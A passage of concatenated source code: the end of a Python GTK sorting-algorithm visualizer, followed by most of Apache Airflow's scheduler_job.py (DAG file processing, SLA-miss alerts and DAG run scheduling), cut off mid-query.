cairoContext.rectangle(baseMargin + nf + (bw + self.gapsToggle.get_active()) * i, self.mainDArea.get_allocation().height - listToSort[i] + nf, bw - nf, listToSort[i] - nf)
cairoContext.fill() if self.fillToggle.get_active() else cairoContext.stroke()
self.changesMadeLbl.set_label("Changes made to list: " + str(addl[1]))
def on_tick(self, widget, frameClock, thread):
self.mainDArea.queue_draw()
return thread.is_alive()
def start_on_click(self, widget):
choice = algsSwitcher[self.algsCombo.get_active()]
arguments = (listToSort, addl)
if choice == quicksort:
arguments += (0, len(listToSort) - 1)
global sortingThread
if not sortingThread.is_alive():
addl[4] = 0
addl[2].clear()
sortingThread = threading.Thread(target = choice, args = arguments, daemon = True)
sortingThread.start()
self.window.add_tick_callback(self.on_tick, sortingThread)
def refr_on_click(self, widget):
addl[3] = True
addl[2].set()
addl[1] = 0
self.generate_heights()
self.mainDArea.queue_draw()
def algs_on_change(self, widget):
addl[3] = False
addl[2].set()
if widget == self.algsCombo:
if widget.get_active() == 3:
self.rsSubrtToggle.show()
else:
self.rsSubrtToggle.hide()
else:
if widget.get_active():
addl[5] = bubblesort
self.rsSubrtToggle.set_label("Subroutine: BS")
else:
addl[5] = countingsort
self.rsSubrtToggle.set_label("Subroutine: CS")
def on_setting_change(self, widget):
addl[0] = self.speedSBtn.get_value()
self.mainDArea.queue_draw()
if self.barOrderToggle.get_active():
addl[6] = True
self.barOrderToggle.set_label("Bars: descending")
else:
addl[6] = False
self.barOrderToggle.set_label("Bars: shuffled")
if self.barWidthSBtn.get_value() < 3:
self.fillToggle.set_active(True)
self.fillToggle.set_sensitive(False)
else:
self.fillToggle.set_sensitive(True)
if (widget == self.barWidthSBtn or widget == self.gapsToggle or widget == self.barOrderToggle) and not sortingThread.is_alive():
self.generate_heights()
|
scheduler_job.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from itertools import groupby
from typing import Dict, List, Optional, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.executors.executor_loader import ExecutorLoader
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagrun import DagRun
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKeyType
from airflow.operators.dummy_operator import DummyOperator
from airflow.stats import Stats
from airflow.ti_deps.dep_context import DepContext
from airflow.ti_deps.dependencies_deps import SCHEDULED_DEPS
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, FailureCallbackRequest, SimpleDag, SimpleDagBag,
)
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
from airflow.utils.types import DagRunType
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_id_white_list: Optional[List[str]],
failure_callback_requests: List[FailureCallbackRequest]
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_id_white_list = dag_id_white_list
self._failure_callback_requests = failure_callback_requests
# The process that was launched to process the given .
self._process = None
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
self._parent_channel = None
self._result_queue = None
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
failure_callback_requests):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: list[airflow.utils.dag_processing.FailureCallbackRequest]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
pickle_dags=pickle_dags,
failure_callback_requests=failure_callback_requests,
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception: # pylint: disable=broad-except
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._failure_callback_requests
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
@property
def waitable_handle(self):
return self._process.sentinel
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to save the processing process
:type log: logging.Logger
"""
UNIT_TEST_MODE = conf.getboolean('core', 'UNIT_TEST_MODE')
def __init__(self, dag_ids, log):
super().__init__()
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
qry = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == qry.c.task_id,
TI.execution_date == qry.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis: # pylint: disable=too-many-nested-blocks
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas: # pylint: disable=too-many-nested-blocks
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception: # pylint: disable=broad-except
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception: # pylint: disable=broad-except
Stats.incr('sla_email_notification_failure')
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
# pylint: disable=too-many-return-statements,too-many-branches
@provide_session
def create_dag_run(self, dag, dag_runs=None, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
# pylint: disable=too-many-nested-blocks
if not dag.schedule_interval:
return None
if dag_runs is None:
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
else:
active_runs = [
dag_run
for dag_run in dag_runs
if not dag_run.external_trigger
]
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return None
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return None
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(f"{DagRunType.SCHEDULED.value}__%"))
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dag's that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now or isinstance(dag.schedule_interval, timedelta):
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return None
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return None
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return None
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=f"{DagRunType.SCHEDULED.value}__{next_run_date.isoformat()}",
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
return None
@provide_session
def _process_task_instances(
self, dag: DAG, dag_runs: List[DagRun], session=None
) -> List[TaskInstanceKeyType]:
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
active_dag_runs = 0
task_instances_list = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future unless
# specified by config and schedule_interval is None
if run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if active_dag_runs >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag # type: ignore
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
ready_tis = run.update_state(session=session)
if run.state == State.RUNNING:
active_dag_runs += 1
self.log.debug("Examining active DAG run: %s", run)
for ti in ready_tis:
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
return task_instances_list
@provide_session
def _process_dags(self, dags: List[DAG], session=None):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs (if CHECK_SLAS config enabled).
:param dags: the DAGs from the DagBag to process
:type dags: List[airflow.models.DAG]
:rtype: list[TaskInstance]
:return: A list of generated TaskInstance objects
"""
check_slas = conf.getboolean('core', 'CHECK_SLAS', fallback=True)
use_job_schedule = conf.getboolean('scheduler', 'USE_JOB_SCHEDULE')
# pylint: disable=too-many-nested-blocks
tis_out: List[TaskInstanceKeyType] = []
dag_ids = [dag.dag_id for dag in dags]
dag_runs = DagRun.find(dag_id=dag_ids, state=State.RUNNING, session=session)
# As per the docs of groupby (https://docs.python.org/3/library/itertools.html#itertools.groupby)
# we need to use `list()` otherwise the result will be wrong/incomplete
dag_runs_by_dag_id = {k: list(v) for k, v in groupby(dag_runs, lambda d: d.dag_id)}
for dag in dags:
dag_id = dag.dag_id
self.log.info("Processing %s", dag_id)
dag_runs_for_dag = dag_runs_by_dag_id.get(dag_id) or []
# Only creates DagRun for DAGs that are not subdag since
# DagRun of subdags are created when SubDagOperator executes.
if not dag.is_subdag and use_job_schedule:
dag_run = self.create_dag_run(dag, dag_runs=dag_runs_for_dag)
if dag_run:
dag_runs_for_dag.append(dag_run)
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
if dag_runs_for_dag:
tis_out.extend(self._process_task_instances(dag, dag_runs_for_dag))
if check_slas:
self.manage_slas(dag)
return tis_out
def _find_dags_to_process(self, dags: List[DAG]) -> List[DAG]:
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:return: DAGs to process
"""
if self.dag_ids:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids]
return dags
@provide_session
def execute_on_failure_callbacks(self, dagbag, failure_callback_requests, session=None):
"""
Execute on failure callbacks. These objects can come from SchedulerJob or from
DagFileProcessorManager.
:param failure_callback_requests: failure callbacks to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param session: DB session.
"""
TI = models.TaskInstance
for request in failure_callback_requests:
simple_ti = request.simple_task_instance
if simple_ti.dag_id in dagbag.dags:
dag = dagbag.dags[simple_ti.dag_id]
if simple_ti.task_id in dag.task_ids:
task = dag.get_task(simple_ti.task_id)
ti = TI(task, simple_ti.execution_date)
# Get properties needed for failure handling from SimpleTaskInstance.
ti.start_date = simple_ti.start_date
ti.end_date = simple_ti.end_date
ti.try_number = simple_ti.try_number
ti.state = simple_ti.state
ti.test_mode = self.UNIT_TEST_MODE
ti.handle_failure(request.msg, ti.test_mode, ti.get_template_context())
self.log.info('Executed failure callback for %s in state %s', ti, ti.state)
session.commit()
@provide_session
def process_file(
self, file_path, failure_callback_requests, pickle_dags=False, session=None
) -> Tuple[List[SimpleDag], int]:
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param failure_callback_requests: failure callback to execute
:type failure_callback_requests: List[airflow.utils.dag_processing.FailureCallbackRequest]
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a tuple with list of SimpleDags made from the Dags found in the file and
count of import errors.
:rtype: Tuple[List[SimpleDag], int]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception: # pylint: disable=broad-except
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], 0
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
try:
self.execute_on_failure_callbacks(dagbag, failure_callback_requests)
except Exception: # pylint: disable=broad-except
self.log.exception("Error executing failure callback!")
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
dagbag.sync_to_db()
paused_dag_ids = DagModel.get_paused_dag_ids(dag_ids=dagbag.dag_ids)
unpaused_dags = [dag for dag_id, dag in dagbag.dags.items() if dag_id not in paused_dag_ids]
simple_dags = self._prepare_simple_dags(unpaused_dags, pickle_dags, session)
dags = self._find_dags_to_process(unpaused_dags)
ti_keys_to_schedule = self._process_dags(dags, session)
self._schedule_task_instances(dagbag, ti_keys_to_schedule, session)
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception: # pylint: disable=broad-except
self.log.exception("Error logging import errors!")
return simple_dags, len(dagbag.import_errors)
@provide_session
def _schedule_task_instances(
self,
dagbag: models.DagBag,
ti_keys_to_schedule: List[TaskInstanceKeyType],
session=None
) -> None:
"""
Checks whether the tasks specified by `ti_keys_to_schedule` parameter can be scheduled and
updates the information in the database,
:param dagbag: DagBag
:type dagbag: models.DagBag
:param ti_keys_to_schedule: List of task instnace keys which can be scheduled.
:type ti_keys_to_schedule: list
"""
# Refresh all task instances that will be scheduled
TI = models.TaskInstance
filter_for_tis = TI.filter_for_tis(ti_keys_to_schedule)
refreshed_tis: List[models.TaskInstance] = []
if filter_for_tis is not None:
refreshed_tis = session.query(TI).filter(filter_for_tis).with_for_update().all()
for ti in refreshed_tis:
# Add task to task instance
dag = dagbag.dags[ti.key[0]]
ti.task = dag.get_task(ti.key[1])
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# If the task is dummy, then mark it as done automatically
if isinstance(ti.task, DummyOperator) \
and not ti.task.on_execute_callback \
and not ti.task.on_success_callback:
ti.state = State.SUCCESS
ti.start_date = ti.end_date = timezone.utcnow()
ti.duration = 0
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
@provide_session
def _prepare_simple_dags(self, dags: List[DAG], pickle_dags: bool, session=None) -> List[SimpleDag]:
"""
Convert DAGS to SimpleDags. If necessary, it also Pickle the DAGs
:param dags: List of DAGs
:param pickle_dags: whether serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: List of SimpleDag
:rtype: List[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = []
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag in dags:
pickle_id = dag.pickle(session).id if pickle_dags else None
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
return simple_dags
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
do_pickle=False,
log=None,
*args, **kwargs):
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super().__init__(*args, **kwargs)
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
def register_exit_signals(self):
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def _change_state_for_tis_without_dagrun(self,
simple_dag_bag,
old_states,
new_state,
session=None):
"""
For all DAG IDs in the SimpleDagBag, look for task instances in the
old_states and set them to new_state if the corresponding DagRun
does not exist or exists but is not in the running state. This
normally should not happen, but it can if the state of DagRuns are
changed manually.
:param old_states: examine TaskInstances in this state
:type old_states: list[airflow.utils.state.State]
:param new_state: set TaskInstances to this state
:type new_state: airflow.utils.state.State
:param simple_dag_bag: TaskInstances associated with DAGs in the
simple_dag_bag and with states in the old_states will be examined
:type simple_dag_bag: airflow.utils.dag_processing.SimpleDagBag
"""
tis_changed = 0
query = session \
.query(models.TaskInstance) \
.outerjoin(models.DagRun, and_(
models.TaskInstance.dag_id == models.DagRun.dag_id,
models.TaskInstance.execution_date == models.DagRun.execution_date)) \
.filter(models.TaskInstance.dag_id.in_(simple_dag_bag.dag_ids)) \
